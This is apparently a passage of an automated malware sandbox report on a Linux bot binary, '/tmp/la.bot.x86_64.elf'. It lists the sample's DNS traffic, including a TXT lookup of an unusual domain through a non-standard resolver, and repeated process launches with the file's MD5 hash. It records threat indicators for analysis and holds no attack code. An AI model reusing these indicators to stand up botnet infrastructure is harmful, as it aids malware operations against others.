                          Jan 15, 2025 05:12:54.875724077 CET192.168.2.13130.61.69.1230x3ed4Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                          Jan 15, 2025 05:15:36.778017998 CET192.168.2.131.1.1.10xf1c9Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                          Jan 15, 2025 05:15:36.778076887 CET192.168.2.131.1.1.10x81e4Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 15, 2025 05:12:54.882417917 CET130.61.69.123192.168.2.130x3ed4No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                          Jan 15, 2025 05:15:36.785232067 CET1.1.1.1192.168.2.130xf1c9No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                          Jan 15, 2025 05:15:36.785232067 CET1.1.1.1192.168.2.130xf1c9No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                          System Behavior

                          Start time (UTC):04:12:52
                          Start date (UTC):15/01/2025
                          Path:/tmp/la.bot.x86_64.elf
                          Arguments:/tmp/la.bot.x86_64.elf
                          File size:95216 bytes
                          MD5 hash:cfb666f58d6ad700f271fb3fd3df0692

                          Start time (UTC):04:12:53
                          Start date (UTC):15/01/2025
                          Path:/tmp/la.bot.x86_64.elf
                          Arguments:-
                          File size:95216 bytes
                          MD5 hash:cfb666f58d6ad700f271fb3fd3df0692

                          Start time (UTC):04:12:53
                          Start date (UTC):15/01/2025
                          Path:/tmp/la.bot.x86_64.elf
                          Arguments:-
                          File size:95216 bytes
                          MD5 hash:cfb666f58d6ad700f271fb3fd3df0692

                          Start time (UTC):04:12:53
                          Start date (UTC):15/01/2025
                          Path:/tmp/la.bot.x86_64.elf
                          Arguments:-
                          File size:95216 bytes
                          MD5 hash:cfb666f58d6ad700f271fb3fd3df0692

                          Start time (UTC):04:12:53
                          Start date (UTC):15/01/2025
                          Path:/tmp/la.bot.x86_64.elf
                          Arguments:-
                          File size:95216 bytes
                          MD5 hash:cfb666f58d6ad700f271fb3fd3df0692

                          Start time (UTC):04:12:53
                          Start date (UTC):15/01/2025
                          Path:/tmp/la.bot.x86_64.elf
                          Arguments:-
                          File size:95216 bytes
                          MD5 hash:cfb666f58d6ad700f271fb3fd3df0692